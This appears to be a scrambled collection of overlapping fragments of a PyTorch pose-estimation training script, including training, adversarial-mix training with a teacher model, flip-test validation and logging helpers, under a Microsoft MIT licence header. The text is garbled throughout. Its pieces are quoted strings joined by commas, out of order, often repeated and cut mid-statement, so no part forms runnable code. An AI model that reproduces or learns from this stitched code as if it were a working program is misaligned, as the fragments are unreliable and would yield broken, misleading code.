= np.zeros((num_samples, 6)) image_path =", "outputs_flipped output_flipped = flip_back(output_flipped.cpu().numpy(), val_dataset.flip_pairs) if not cpu: output_flipped = torch.from_numpy(output_flipped.copy()).cuda() else: output_flipped", "np import torch from core.evaluate import accuracy from core.inference import get_final_preds, get_final_preds_using_softargmax, SoftArgmax2D", "target_weight) # compute gradient and do update step optimizer.zero_grad() loss.backward() optimizer.step() # measure", "global_steps + 1 return name_values, perf_indicator # markdown format output def _print_name_value(name_value, full_arch_name):", "time_gpu / len(val_loader)) name_values, perf_indicator = val_dataset.evaluate( config, all_preds, output_dir, all_boxes, image_path, filenames,", "= torch.from_numpy(output_flipped.copy()) # feature is not aligned, shift flipped heatmap for higher accuracy", "gradient and do update step set_require_grad(model, False) optimizer_G.zero_grad() outputs = model(tmp) output =", "list): nets = [nets] for net in nets: if net is not None:", "Copyright (c) Microsoft # Licensed under the MIT License. # Written by <NAME>", "get_final_preds, get_final_preds_using_softargmax, SoftArgmax2D from utils.transforms import flip_back, tofloat, coord_norm, inv_coord_norm, _tocopy, _tocuda from", "= time.time() outputs = model(input) infer_end = time.time() torch.cuda.synchronize() time_gpu += (infer_end -", "image_path = [] filenames = [] imgnums = [] idx = 0 feat_dict", "value in values]) + ' |' ) class AverageMeter(object): \"\"\"Computes and stores the", "writer_dict): batch_time = AverageMeter() data_time = AverageMeter() losses = AverageMeter() acc = AverageMeter()", "param in net.parameters(): param.requires_grad = requires_grad def train_advmix(config, args, train_loader, models, criterion, optimizers,", "len(full_arch_name) > 15: full_arch_name = full_arch_name[:8] + '...' 
logger.info( '| ' + full_arch_name", "loss=losses, acc=acc) logger.info(msg) prefix = '{}_{}'.format( os.path.join(output_dir, 'val'), i ) save_debug_images(config, input, meta,", "------------------------------------------------------------------------------ from __future__ import absolute_import from __future__ import division from __future__ import print_function", "= input.cuda() # compute output torch.cuda.synchronize() infer_start = time.time() outputs = model(input) infer_end", "= accuracy(output, target, args=None, cfg=config) acc.update(avg_acc, cnt) batch_time.update(time.time() - end) end = time.time()", "# Written by <NAME> (<EMAIL>) # ------------------------------------------------------------------------------ from __future__ import absolute_import from __future__", "import tqdm import torch.nn.functional as F logger = logging.getLogger(__name__) def train(config, args, train_loader,", "from utils.transforms import flip_back, tofloat, coord_norm, inv_coord_norm, _tocopy, _tocuda from utils.vis import save_debug_images", "samples/s\\t' \\ 'Data {data_time.val:.3f}s ({data_time.avg:.3f}s)\\t' \\ 'Loss {loss.val:.5f} ({loss.avg:.5f})\\t' \\ 'Accuracy {acc.val:.3f} ({acc.avg:.3f})'.format(", "if isinstance(name_values, list): for name_value in name_values: writer.add_scalars( 'valid', dict(name_value), global_steps ) else:", "not None: for param in net.parameters(): param.requires_grad = requires_grad def train_advmix(config, args, train_loader,", "data_time.update(time.time() - end) outputs = model(input) target = target[0].cuda(non_blocking=True) target_hm = target target_weight", "= full_arch_name[:8] + '...' 
logger.info( '| ' + full_arch_name + ' ' +", "global_steps ) if isinstance(name_values, list): for name_value in name_values: writer.add_scalars( 'valid', dict(name_value), global_steps", "acc.val, global_steps) writer_dict['train_global_steps'] = global_steps + 1 prefix = '{}_{}'.format(os.path.join(output_dir, 'train'), i) save_debug_images(config,", "cpu: target = target[0].cuda(non_blocking=True) target_hm = target target_weight = target_weight.cuda(non_blocking=True) loss = criterion(output,", "this all_boxes parts all_boxes[idx:idx + num_images, 0:2] = c[:, 0:2] all_boxes[idx:idx + num_images,", "import save_debug_images import torch.nn as nn from tqdm import tqdm import torch.nn.functional as", "feature is not aligned, shift flipped heatmap for higher accuracy if config.TEST.SHIFT_HEATMAP: output_flipped[:,", "batch_time=batch_time, loss=losses, acc=acc) logger.info(msg) prefix = '{}_{}'.format( os.path.join(output_dir, 'val'), i ) save_debug_images(config, input,", "+ num_images, :, 2:3] = maxvals # double check this all_boxes parts all_boxes[idx:idx", "' |' ) logger.info('|---' * (num_values+1) + '|') if len(full_arch_name) > 15: full_arch_name", "= time.time() # corresponding center scale joint c = meta['center'].numpy() s = meta['scale'].numpy()", "filenames, imgnums ) model_name = config.MODEL.NAME if isinstance(name_values, list): for name_value in name_values:", "+ ' '.join(['| {}'.format(name) for name in names]) + ' |' ) logger.info('|---'", "with torch.no_grad(): end = time.time() time_gpu = 0. 
for i, (input, target, target_weight,", "save_debug_images(config, inputs[0], copy.deepcopy(meta), target, pred*4, outputs, prefix + '_clean') save_debug_images(config, tmp, copy.deepcopy(meta), target,", "args, val_loader, val_dataset, model, criterion, output_dir, tb_log_dir, writer_dict=None, cpu=False): batch_time = AverageMeter() losses", "self.count += n self.avg = self.sum / self.count if self.count != 0 else", "== 0: msg = 'Test: [{0}/{1}]\\t' \\ 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t' \\ 'Loss {loss.val:.4f}", "idx += num_images if i % config.PRINT_FREQ == 0: msg = 'Test: [{0}/{1}]\\t'", "* mix_weight[:,list_index].unsqueeze(dim=1) D_output_detach = model(tmp.detach()) with torch.no_grad(): teacher_output = model_teacher(inputs[0]) loss_D_hm = criterion(D_output_detach,", "reset(self): self.val = 0 self.avg = 0 self.sum = 0 self.count = 0", "loss_D = loss_D_hm * (1 - args.alpha) + loss_D_kd * args.alpha loss_D.backward() optimizer.step()", "= 0. for i, (input, target, target_weight, meta) in tqdm(enumerate(val_loader)): if not cpu:", "_, avg_acc, cnt, pred = accuracy(outputs, target, args=None, cfg=config) outputs = _tocuda(outputs) acc.update(avg_acc,", "meta, target_hm, pred*4, outputs, prefix) def set_require_grad(nets, requires_grad=True): if not isinstance(nets, list): nets", "global_steps) writer_dict['train_global_steps'] = global_steps + 1 prefix = '{}_{}'.format(os.path.join(output_dir, 'train'), i) save_debug_images(config, inputs[0],", "i) save_debug_images(config, input, meta, target_hm, pred*4, outputs, prefix) def set_require_grad(nets, requires_grad=True): if not", "net.parameters(): param.requires_grad = requires_grad def train_advmix(config, args, train_loader, models, criterion, optimizers, epoch, output_dir,", "config.MODEL.NUM_JOINTS, 3), dtype=np.float32 ) all_boxes = np.zeros((num_samples, 6)) image_path = [] filenames =", "({acc.avg:.3f})'.format( epoch, i, len(train_loader), batch_time=batch_time, 
speed=input.size(0)/batch_time.val, data_time=data_time, loss=losses, acc=acc) logger.info(msg) writer = writer_dict['writer']", "' ' + ' '.join(['| {:.3f}'.format(value) for value in values]) + ' |'", "teacher_output, target_weight) loss_D = loss_D_hm * (1 - args.alpha) + loss_D_kd * args.alpha", "-criterion(output, target, target_weight) * args.adv_loss_weight loss_G.backward() optimizer_G.step() # measure accuracy and record loss", "time import logging import os, copy import numpy as np import torch from", "= '{}_{}'.format( os.path.join(output_dir, 'val'), i ) save_debug_images(config, input, meta, target_hm, pred * 4,", "+ num_images, 5] = score image_path.extend(meta['image']) idx += num_images if i % config.PRINT_FREQ", "= model(tmp.detach()) with torch.no_grad(): teacher_output = model_teacher(inputs[0]) loss_D_hm = criterion(D_output_detach, target, target_weight) loss_D_kd", "import division from __future__ import print_function import time import logging import os, copy", "% config.PRINT_FREQ == 0: msg = 'Epoch: [{0}][{1}/{2}]\\t' \\ 'Time {batch_time.val:.3f}s ({batch_time.avg:.3f}s)\\t' \\", "# Licensed under the MIT License. 
# Written by <NAME> (<EMAIL>) # ------------------------------------------------------------------------------", "meta['scale'].numpy() score = meta['score'].numpy() preds, maxvals = get_final_preds( config, args, output.clone().cpu().numpy(), c, s)", "target_weight.cuda(non_blocking=True) loss = criterion(outputs, target, target_weight) # compute gradient and do update step", "losses = AverageMeter() acc = AverageMeter() if isinstance(model, list): model = model[0].train() model_D", "({loss.avg:.5f})\\t' \\ 'Accuracy {acc.val:.3f} ({acc.avg:.3f})'.format( epoch, i, len(train_loader), batch_time=batch_time, speed=inputs[0].size(0)/batch_time.val, data_time=data_time, loss=losses, acc=acc)", "import torch.nn as nn from tqdm import tqdm import torch.nn.functional as F logger", "isinstance(models, list): model = models[0].train() model_G = models[1].train() model_teacher = models[2].eval() else: models.train()", "loss losses.update(loss_D.item(), inputs[0].size(0)) _, avg_acc, cnt, pred = accuracy(output, target, args=None, cfg=config) acc.update(avg_acc,", "pred*4, outputs, prefix + '_clean') save_debug_images(config, tmp, copy.deepcopy(meta), target, pred*4, outputs, prefix) def", "= writer_dict['writer'] global_steps = writer_dict['valid_global_steps'] writer.add_scalar( 'valid_loss', losses.avg, global_steps ) writer.add_scalar( 'valid_acc', acc.avg,", "if not cpu: input = input.cuda() # compute output torch.cuda.synchronize() infer_start = time.time()", "val * n self.count += n self.avg = self.sum / self.count if self.count", "'valid_loss', losses.avg, global_steps ) writer.add_scalar( 'valid_acc', acc.avg, global_steps ) if isinstance(name_values, list): for", "target_weight.cuda(non_blocking=True) loss = criterion(output, target, target_weight) num_images = input.size(0) # measure accuracy and", "torch.cat(inputs, dim=1) mix_weight = F.softmax(model_G(G_input), dim=1) set_require_grad(model, True) optimizer.zero_grad() tmp = inputs[0] *", "val_dataset, model, 
criterion, output_dir, tb_log_dir, writer_dict=None, cpu=False): batch_time = AverageMeter() losses = AverageMeter()", "np.zeros( (num_samples, config.MODEL.NUM_JOINTS, 3), dtype=np.float32 ) all_boxes = np.zeros((num_samples, 6)) image_path = []", "outputs if config.TEST.FLIP_TEST: input_flipped = input.flip(3) outputs_flipped = model(input_flipped) if isinstance(outputs_flipped, list): output_flipped", "import get_final_preds, get_final_preds_using_softargmax, SoftArgmax2D from utils.transforms import flip_back, tofloat, coord_norm, inv_coord_norm, _tocopy, _tocuda", "outputs = model(input) infer_end = time.time() torch.cuda.synchronize() time_gpu += (infer_end - infer_start) if", "= len(name_value) logger.info( '| Arch ' + ' '.join(['| {}'.format(name) for name in", "class AverageMeter(object): \"\"\"Computes and stores the average and current value\"\"\" def __init__(self): self.reset()", "get_final_preds_using_softargmax, SoftArgmax2D from utils.transforms import flip_back, tofloat, coord_norm, inv_coord_norm, _tocopy, _tocuda from utils.vis", "and record loss losses.update(loss.item(), input.size(0)) _, avg_acc, cnt, pred = accuracy(outputs, target, args=None,", "1 prefix = '{}_{}'.format(os.path.join(output_dir, 'train'), i) save_debug_images(config, input, meta, target_hm, pred*4, outputs, prefix)", "= F.softmax(model_G(G_input), dim=1) set_require_grad(model, True) optimizer.zero_grad() tmp = inputs[0] * mix_weight[:,0,...].unsqueeze(dim=1) for list_index", "global_steps) writer_dict['train_global_steps'] = global_steps + 1 prefix = '{}_{}'.format(os.path.join(output_dir, 'train'), i) save_debug_images(config, input,", "average and current value\"\"\" def __init__(self): self.reset() def reset(self): self.val = 0 self.avg", "models[0].train() model_G = models[1].train() model_teacher = models[2].eval() else: models.train() optimizer = optimizers[0] optimizer_G", "i) save_debug_images(config, inputs[0], copy.deepcopy(meta), target, pred*4, outputs, prefix + 
'_clean') save_debug_images(config, tmp, copy.deepcopy(meta),", "output_flipped = outputs_flipped[-1] else: output_flipped = outputs_flipped output_flipped = flip_back(output_flipped.cpu().numpy(), val_dataset.flip_pairs) if not", "loss_D_hm = criterion(D_output_detach, target, target_weight) loss_D_kd = criterion(D_output_detach, teacher_output, target_weight) loss_D = loss_D_hm", "writer_dict=None, cpu=False): batch_time = AverageMeter() losses = AverageMeter() acc = AverageMeter() # switch", "if not cpu: target = target[0].cuda(non_blocking=True) target_hm = target target_weight = target_weight.cuda(non_blocking=True) loss", "= model(tmp) output = outputs loss_G = -criterion(output, target, target_weight) * args.adv_loss_weight loss_G.backward()", "end = time.time() if i % config.PRINT_FREQ == 0: msg = 'Epoch: [{0}][{1}/{2}]\\t'", ") all_boxes = np.zeros((num_samples, 6)) image_path = [] filenames = [] imgnums =", "if i % config.PRINT_FREQ == 0: msg = 'Test: [{0}/{1}]\\t' \\ 'Time {batch_time.val:.3f}", "evaluate mode model.eval() num_samples = len(val_dataset) all_preds = np.zeros( (num_samples, config.MODEL.NUM_JOINTS, 3), dtype=np.float32", "D_output_detach = model(tmp.detach()) with torch.no_grad(): teacher_output = model_teacher(inputs[0]) loss_D_hm = criterion(D_output_detach, target, target_weight)", "time.time() outputs = model(input) infer_end = time.time() torch.cuda.synchronize() time_gpu += (infer_end - infer_start)", "writer.add_scalar('train_loss', losses.val, global_steps) writer.add_scalar('train_acc', acc.val, global_steps) writer_dict['train_global_steps'] = global_steps + 1 prefix =", "_ in inputs] target = targets[0].cuda(non_blocking=True) target_weight = target_weights[0].cuda(non_blocking=True) meta = metas[0] else:", "optimizer.zero_grad() tmp = inputs[0] * mix_weight[:,0,...].unsqueeze(dim=1) for list_index in range(1, len(inputs)): tmp +=", "{:.3f}'.format(value) for value in values]) + ' |' ) class AverageMeter(object): \"\"\"Computes 
and", "'valid', dict(name_values), global_steps ) writer_dict['valid_global_steps'] = global_steps + 1 return name_values, perf_indicator #", "target target_weight = target_weight.cuda(non_blocking=True) loss = criterion(outputs, target, target_weight) # compute gradient and", "loss = criterion(outputs, target, target_weight) # compute gradient and do update step optimizer.zero_grad()", "2:3] = maxvals # double check this all_boxes parts all_boxes[idx:idx + num_images, 0:2]", "image_path.extend(meta['image']) idx += num_images if i % config.PRINT_FREQ == 0: msg = 'Test:", "from core.evaluate import accuracy from core.inference import get_final_preds, get_final_preds_using_softargmax, SoftArgmax2D from utils.transforms import", "'Speed {speed:.1f} samples/s\\t' \\ 'Data {data_time.val:.3f}s ({data_time.avg:.3f}s)\\t' \\ 'Loss {loss.val:.5f} ({loss.avg:.5f})\\t' \\ 'Accuracy", "# feature is not aligned, shift flipped heatmap for higher accuracy if config.TEST.SHIFT_HEATMAP:", "torch.cuda.synchronize() infer_start = time.time() outputs = model(input) infer_end = time.time() torch.cuda.synchronize() time_gpu +=", ":, 1:] = \\ output_flipped.clone()[:, :, :, 0:-1] output = (output + output_flipped)", "the MIT License. 
# Written by <NAME> (<EMAIL>) # ------------------------------------------------------------------------------ from __future__ import", "* mix_weight[:,0,...].unsqueeze(dim=1) for list_index in range(1, len(inputs)): tmp += inputs[list_index] * mix_weight[:,list_index].unsqueeze(dim=1) D_output_detach", "= outputs if config.TEST.FLIP_TEST: input_flipped = input.flip(3) outputs_flipped = model(input_flipped) if isinstance(outputs_flipped, list):", "list): for name_value in name_values: _print_name_value(name_value, model_name) else: _print_name_value(name_values, model_name) if writer_dict: writer", "if writer_dict: writer = writer_dict['writer'] global_steps = writer_dict['valid_global_steps'] writer.add_scalar( 'valid_loss', losses.avg, global_steps )", "shift flipped heatmap for higher accuracy if config.TEST.SHIFT_HEATMAP: output_flipped[:, :, :, 1:] =", "'{}_{}'.format(os.path.join(output_dir, 'train'), i) save_debug_images(config, input, meta, target_hm, pred*4, outputs, prefix) def set_require_grad(nets, requires_grad=True):", "_tocopy, _tocuda from utils.vis import save_debug_images import torch.nn as nn from tqdm import", "is :', time_gpu / len(val_loader)) name_values, perf_indicator = val_dataset.evaluate( config, all_preds, output_dir, all_boxes,", "save_debug_images import torch.nn as nn from tqdm import tqdm import torch.nn.functional as F", "\\ 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t' \\ 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t' \\ 'Accuracy {acc.val:.3f} ({acc.avg:.3f})'.format( i,", "is not aligned, shift flipped heatmap for higher accuracy if config.TEST.SHIFT_HEATMAP: output_flipped[:, :,", "optimizer.step() # G: compute gradient and do update step set_require_grad(model, False) optimizer_G.zero_grad() outputs", "under the MIT License. 
# Written by <NAME> (<EMAIL>) # ------------------------------------------------------------------------------ from __future__", "outputs = model(tmp) output = outputs loss_G = -criterion(output, target, target_weight) * args.adv_loss_weight", "in tqdm(enumerate(val_loader)): if not cpu: input = input.cuda() # compute output torch.cuda.synchronize() infer_start", "list): output = outputs[-1] else: output = outputs if config.TEST.FLIP_TEST: input_flipped = input.flip(3)", "loss = criterion(output, target, target_weight) num_images = input.size(0) # measure accuracy and record", "outputs, prefix) def set_require_grad(nets, requires_grad=True): if not isinstance(nets, list): nets = [nets] for", "measure accuracy and record loss losses.update(loss_D.item(), inputs[0].size(0)) _, avg_acc, cnt, pred = accuracy(output,", "train_loader, models, criterion, optimizers, epoch, output_dir, tb_log_dir, writer_dict): batch_time = AverageMeter() data_time =", "output = outputs if config.TEST.FLIP_TEST: input_flipped = input.flip(3) outputs_flipped = model(input_flipped) if isinstance(outputs_flipped,", "_print_name_value(name_value, full_arch_name): names = name_value.keys() values = name_value.values() num_values = len(name_value) logger.info( '|", "tqdm import torch.nn.functional as F logger = logging.getLogger(__name__) def train(config, args, train_loader, model,", "mask_channel = meta['model_supervise_channel'] > 0.5 if isinstance(inputs, list): inputs = [_.cuda(non_blocking=True) for _", "torch.no_grad(): teacher_output = model_teacher(inputs[0]) loss_D_hm = criterion(D_output_detach, target, target_weight) loss_D_kd = criterion(D_output_detach, teacher_output,", "batch_time=batch_time, speed=inputs[0].size(0)/batch_time.val, data_time=data_time, loss=losses, acc=acc) logger.info(msg) writer = writer_dict['writer'] global_steps = writer_dict['train_global_steps'] writer.add_scalar('train_loss',", "cnt) batch_time.update(time.time() - end) end = time.time() # corresponding 
center scale joint c", "i, len(val_loader), batch_time=batch_time, loss=losses, acc=acc) logger.info(msg) prefix = '{}_{}'.format( os.path.join(output_dir, 'val'), i )", "+ num_images, :, 0:2] = preds[:, :, 0:2] all_preds[idx:idx + num_images, :, 2:3]", "target_weight) loss_D = loss_D_hm * (1 - args.alpha) + loss_D_kd * args.alpha loss_D.backward()", "'|') if len(full_arch_name) > 15: full_arch_name = full_arch_name[:8] + '...' logger.info( '| '", "target, target_weight) # compute gradient and do update step optimizer.zero_grad() loss.backward() optimizer.step() #", "= time.time() torch.cuda.synchronize() time_gpu += (infer_end - infer_start) if isinstance(outputs, list): output =", "measure accuracy and record loss losses.update(loss.item(), input.size(0)) _, avg_acc, cnt, pred = accuracy(outputs,", "num_values = len(name_value) logger.info( '| Arch ' + ' '.join(['| {}'.format(name) for name", "AverageMeter() losses = AverageMeter() acc = AverageMeter() if isinstance(models, list): model = models[0].train()", "+ ' |' ) class AverageMeter(object): \"\"\"Computes and stores the average and current", "\\ 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t' \\ 'Accuracy {acc.val:.3f} ({acc.avg:.3f})'.format( i, len(val_loader), batch_time=batch_time, loss=losses, acc=acc)", "feat_dict = {} with torch.no_grad(): end = time.time() time_gpu = 0. 
for i,", "nets: if net is not None: for param in net.parameters(): param.requires_grad = requires_grad", "list): for name_value in name_values: writer.add_scalars( 'valid', dict(name_value), global_steps ) else: writer.add_scalars( 'valid',", "\\ 'Speed {speed:.1f} samples/s\\t' \\ 'Data {data_time.val:.3f}s ({data_time.avg:.3f}s)\\t' \\ 'Loss {loss.val:.5f} ({loss.avg:.5f})\\t' \\", "metas) in tqdm(enumerate(train_loader)): data_time.update(time.time() - end) # mask_channel = meta['model_supervise_channel'] > 0.5 if", "i, (input, target, target_weight, meta) in tqdm(enumerate(val_loader)): if not cpu: input = input.cuda()", "model, criterion, output_dir, tb_log_dir, writer_dict=None, cpu=False): batch_time = AverageMeter() losses = AverageMeter() acc", "* args.alpha loss_D.backward() optimizer.step() # G: compute gradient and do update step set_require_grad(model,", "val_dataset.evaluate( config, all_preds, output_dir, all_boxes, image_path, filenames, imgnums ) model_name = config.MODEL.NAME if", "= 'Test: [{0}/{1}]\\t' \\ 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t' \\ 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t' \\ 'Accuracy", "tqdm import tqdm import torch.nn.functional as F logger = logging.getLogger(__name__) def train(config, args,", "import accuracy from core.inference import get_final_preds, get_final_preds_using_softargmax, SoftArgmax2D from utils.transforms import flip_back, tofloat,", "output, prefix) print('=> The average inference time is :', time_gpu / len(val_loader)) name_values,", "model = model[0].train() model_D = model[1].train() else: model.train() end = time.time() for i,", "if isinstance(name_values, list): for name_value in name_values: _print_name_value(name_value, model_name) else: _print_name_value(name_values, model_name) if", "|' ) logger.info('|---' * (num_values+1) + '|') if len(full_arch_name) > 15: full_arch_name =", "requires_grad def train_advmix(config, args, train_loader, models, criterion, optimizers, epoch, output_dir, 
tb_log_dir, writer_dict): batch_time", "torch.nn as nn from tqdm import tqdm import torch.nn.functional as F logger =", "time_gpu += (infer_end - infer_start) if isinstance(outputs, list): output = outputs[-1] else: output", "end) outputs = model(input) target = target[0].cuda(non_blocking=True) target_hm = target target_weight = target_weight.cuda(non_blocking=True)", "({loss.avg:.5f})\\t' \\ 'Accuracy {acc.val:.3f} ({acc.avg:.3f})'.format( epoch, i, len(train_loader), batch_time=batch_time, speed=input.size(0)/batch_time.val, data_time=data_time, loss=losses, acc=acc)", "pred = accuracy(output, target, args=None, cfg=config) acc.update(avg_acc, cnt) batch_time.update(time.time() - end) end =", "prefix = '{}_{}'.format(os.path.join(output_dir, 'train'), i) save_debug_images(config, inputs[0], copy.deepcopy(meta), target, pred*4, outputs, prefix +", "score image_path.extend(meta['image']) idx += num_images if i % config.PRINT_FREQ == 0: msg =", "import absolute_import from __future__ import division from __future__ import print_function import time import", "config.MODEL.NAME if isinstance(name_values, list): for name_value in name_values: _print_name_value(name_value, model_name) else: _print_name_value(name_values, model_name)", "output_flipped.clone()[:, :, :, 0:-1] output = (output + output_flipped) * 0.5 if not", "{loss.val:.5f} ({loss.avg:.5f})\\t' \\ 'Accuracy {acc.val:.3f} ({acc.avg:.3f})'.format( epoch, i, len(train_loader), batch_time=batch_time, speed=inputs[0].size(0)/batch_time.val, data_time=data_time, loss=losses,", ") writer_dict['valid_global_steps'] = global_steps + 1 return name_values, perf_indicator # markdown format output", "criterion(output, target, target_weight) num_images = input.size(0) # measure accuracy and record loss losses.update(loss.item(),", "update step optimizer.zero_grad() loss.backward() optimizer.step() # measure accuracy and record loss losses.update(loss.item(), input.size(0))", "optimizer_G = optimizers[1] end = 
time.time() for i, (inputs, targets, target_weights, metas) in", "+ ' |' ) logger.info('|---' * (num_values+1) + '|') if len(full_arch_name) > 15:", "= optimizers[0] optimizer_G = optimizers[1] end = time.time() for i, (inputs, targets, target_weights,", "get_final_preds( config, args, output.clone().cpu().numpy(), c, s) all_preds[idx:idx + num_images, :, 0:2] = preds[:,", "end) # mask_channel = meta['model_supervise_channel'] > 0.5 if isinstance(inputs, list): inputs = [_.cuda(non_blocking=True)", "epoch, output_dir, tb_log_dir, writer_dict): batch_time = AverageMeter() data_time = AverageMeter() losses = AverageMeter()", "= maxvals # double check this all_boxes parts all_boxes[idx:idx + num_images, 0:2] =", "= AverageMeter() data_time = AverageMeter() losses = AverageMeter() acc = AverageMeter() if isinstance(model,", "losses.update(loss.item(), input.size(0)) _, avg_acc, cnt, pred = accuracy(outputs, target, args=None, cfg=config) outputs =", "\\ 'Data {data_time.val:.3f}s ({data_time.avg:.3f}s)\\t' \\ 'Loss {loss.val:.5f} ({loss.avg:.5f})\\t' \\ 'Accuracy {acc.val:.3f} ({acc.avg:.3f})'.format( epoch,", "loss_D_kd = criterion(D_output_detach, teacher_output, target_weight) loss_D = loss_D_hm * (1 - args.alpha) +", "cpu=False): batch_time = AverageMeter() losses = AverageMeter() acc = AverageMeter() # switch to", "name in names]) + ' |' ) logger.info('|---' * (num_values+1) + '|') if", "if config.TEST.FLIP_TEST: input_flipped = input.flip(3) outputs_flipped = model(input_flipped) if isinstance(outputs_flipped, list): output_flipped =", "model(input_flipped) if isinstance(outputs_flipped, list): output_flipped = outputs_flipped[-1] else: output_flipped = outputs_flipped output_flipped =", "'train'), i) save_debug_images(config, input, meta, target_hm, pred*4, outputs, prefix) def set_require_grad(nets, requires_grad=True): if", "'Loss {loss.val:.5f} ({loss.avg:.5f})\\t' \\ 'Accuracy {acc.val:.3f} ({acc.avg:.3f})'.format( epoch, i, len(train_loader), 
batch_time=batch_time, speed=inputs[0].size(0)/batch_time.val, data_time=data_time,", "'{}_{}'.format( os.path.join(output_dir, 'val'), i ) save_debug_images(config, input, meta, target_hm, pred * 4, output,", "flip_back, tofloat, coord_norm, inv_coord_norm, _tocopy, _tocuda from utils.vis import save_debug_images import torch.nn as", "= AverageMeter() if isinstance(models, list): model = models[0].train() model_G = models[1].train() model_teacher =", "in tqdm(enumerate(train_loader)): data_time.update(time.time() - end) # mask_channel = meta['model_supervise_channel'] > 0.5 if isinstance(inputs,", "criterion, output_dir, tb_log_dir, writer_dict=None, cpu=False): batch_time = AverageMeter() losses = AverageMeter() acc =", "+ '_clean') save_debug_images(config, tmp, copy.deepcopy(meta), target, pred*4, outputs, prefix) def validate(config, args, val_loader,", "# switch to evaluate mode model.eval() num_samples = len(val_dataset) all_preds = np.zeros( (num_samples,", "tqdm(enumerate(train_loader)): data_time.update(time.time() - end) # mask_channel = meta['model_supervise_channel'] > 0.5 if isinstance(inputs, list):", "and record loss losses.update(loss_D.item(), inputs[0].size(0)) _, avg_acc, cnt, pred = accuracy(output, target, args=None,", "= '{}_{}'.format(os.path.join(output_dir, 'train'), i) save_debug_images(config, inputs[0], copy.deepcopy(meta), target, pred*4, outputs, prefix + '_clean')", "losses = AverageMeter() acc = AverageMeter() # switch to evaluate mode model.eval() num_samples", "acc=acc) logger.info(msg) writer = writer_dict['writer'] global_steps = writer_dict['train_global_steps'] writer.add_scalar('train_loss', losses.val, global_steps) writer.add_scalar('train_acc', acc.val,", "num_images, 4] = np.prod(s*200, 1) all_boxes[idx:idx + num_images, 5] = score image_path.extend(meta['image']) idx", "val, n=1): self.val = val self.sum += val * n self.count += n", "= meta['model_supervise_channel'] > 0.5 if isinstance(inputs, list): inputs = 
[_.cuda(non_blocking=True) for _ in", "model_G = models[1].train() model_teacher = models[2].eval() else: models.train() optimizer = optimizers[0] optimizer_G =", "\\ 'Loss {loss.val:.5f} ({loss.avg:.5f})\\t' \\ 'Accuracy {acc.val:.3f} ({acc.avg:.3f})'.format( epoch, i, len(train_loader), batch_time=batch_time, speed=inputs[0].size(0)/batch_time.val,", "dtype=np.float32 ) all_boxes = np.zeros((num_samples, 6)) image_path = [] filenames = [] imgnums", "higher accuracy if config.TEST.SHIFT_HEATMAP: output_flipped[:, :, :, 1:] = \\ output_flipped.clone()[:, :, :,", "current value\"\"\" def __init__(self): self.reset() def reset(self): self.val = 0 self.avg = 0", "0:2] all_preds[idx:idx + num_images, :, 2:3] = maxvals # double check this all_boxes", "{loss.val:.4f} ({loss.avg:.4f})\\t' \\ 'Accuracy {acc.val:.3f} ({acc.avg:.3f})'.format( i, len(val_loader), batch_time=batch_time, loss=losses, acc=acc) logger.info(msg) prefix", "= meta['center'].numpy() s = meta['scale'].numpy() score = meta['score'].numpy() preds, maxvals = get_final_preds( config,", "= time.time() time_gpu = 0. 
for i, (input, target, target_weight, meta) in tqdm(enumerate(val_loader)):", "* 4, output, prefix) print('=> The average inference time is :', time_gpu /", "output = _tocuda(output) acc.update(avg_acc, cnt) batch_time.update(time.time() - end) end = time.time() # corresponding", "compute output torch.cuda.synchronize() infer_start = time.time() outputs = model(input) infer_end = time.time() torch.cuda.synchronize()", ") model_name = config.MODEL.NAME if isinstance(name_values, list): for name_value in name_values: _print_name_value(name_value, model_name)", "from tqdm import tqdm import torch.nn.functional as F logger = logging.getLogger(__name__) def train(config,", "= torch.cat(inputs, dim=1) mix_weight = F.softmax(model_G(G_input), dim=1) set_require_grad(model, True) optimizer.zero_grad() tmp = inputs[0]", "self.count = 0 def update(self, val, n=1): self.val = val self.sum += val", "None: for param in net.parameters(): param.requires_grad = requires_grad def train_advmix(config, args, train_loader, models,", "else: _print_name_value(name_values, model_name) if writer_dict: writer = writer_dict['writer'] global_steps = writer_dict['valid_global_steps'] writer.add_scalar( 'valid_loss',", "' '.join(['| {}'.format(name) for name in names]) + ' |' ) logger.info('|---' *", "isinstance(model, list): model = model[0].train() model_D = model[1].train() else: model.train() end = time.time()", "optimizer = optimizers[0] optimizer_G = optimizers[1] end = time.time() for i, (inputs, targets,", "config.PRINT_FREQ == 0: msg = 'Epoch: [{0}][{1}/{2}]\\t' \\ 'Time {batch_time.val:.3f}s ({batch_time.avg:.3f}s)\\t' \\ 'Speed", "* (num_values+1) + '|') if len(full_arch_name) > 15: full_arch_name = full_arch_name[:8] + '...'", "num_images if i % config.PRINT_FREQ == 0: msg = 'Test: [{0}/{1}]\\t' \\ 'Time", "= target_weight.cuda(non_blocking=True) loss = criterion(output, target, target_weight) num_images = input.size(0) # measure accuracy", 
"target_weights[0].cuda(non_blocking=True) meta = metas[0] else: inputs = inputs.cuda(non_blocking=True) G_input = torch.cat(inputs, dim=1) mix_weight", "target, target_weight) loss_D_kd = criterion(D_output_detach, teacher_output, target_weight) loss_D = loss_D_hm * (1 -", "if not cpu: output_flipped = torch.from_numpy(output_flipped.copy()).cuda() else: output_flipped = torch.from_numpy(output_flipped.copy()) # feature is", "input.cuda() # compute output torch.cuda.synchronize() infer_start = time.time() outputs = model(input) infer_end =", "# corresponding center scale joint c = meta['center'].numpy() s = meta['scale'].numpy() score =", "in inputs] target = targets[0].cuda(non_blocking=True) target_weight = target_weights[0].cuda(non_blocking=True) meta = metas[0] else: inputs", "(1 - args.alpha) + loss_D_kd * args.alpha loss_D.backward() optimizer.step() # G: compute gradient", "[] imgnums = [] idx = 0 feat_dict = {} with torch.no_grad(): end", "'| Arch ' + ' '.join(['| {}'.format(name) for name in names]) + '", "writer_dict['valid_global_steps'] writer.add_scalar( 'valid_loss', losses.avg, global_steps ) writer.add_scalar( 'valid_acc', acc.avg, global_steps ) if isinstance(name_values,", "+ ' ' + ' '.join(['| {:.3f}'.format(value) for value in values]) + '", "= '{}_{}'.format(os.path.join(output_dir, 'train'), i) save_debug_images(config, input, meta, target_hm, pred*4, outputs, prefix) def set_require_grad(nets,", "= [] idx = 0 feat_dict = {} with torch.no_grad(): end = time.time()", "for i, (input, target, target_weight, meta) in tqdm(enumerate(train_loader)): data_time.update(time.time() - 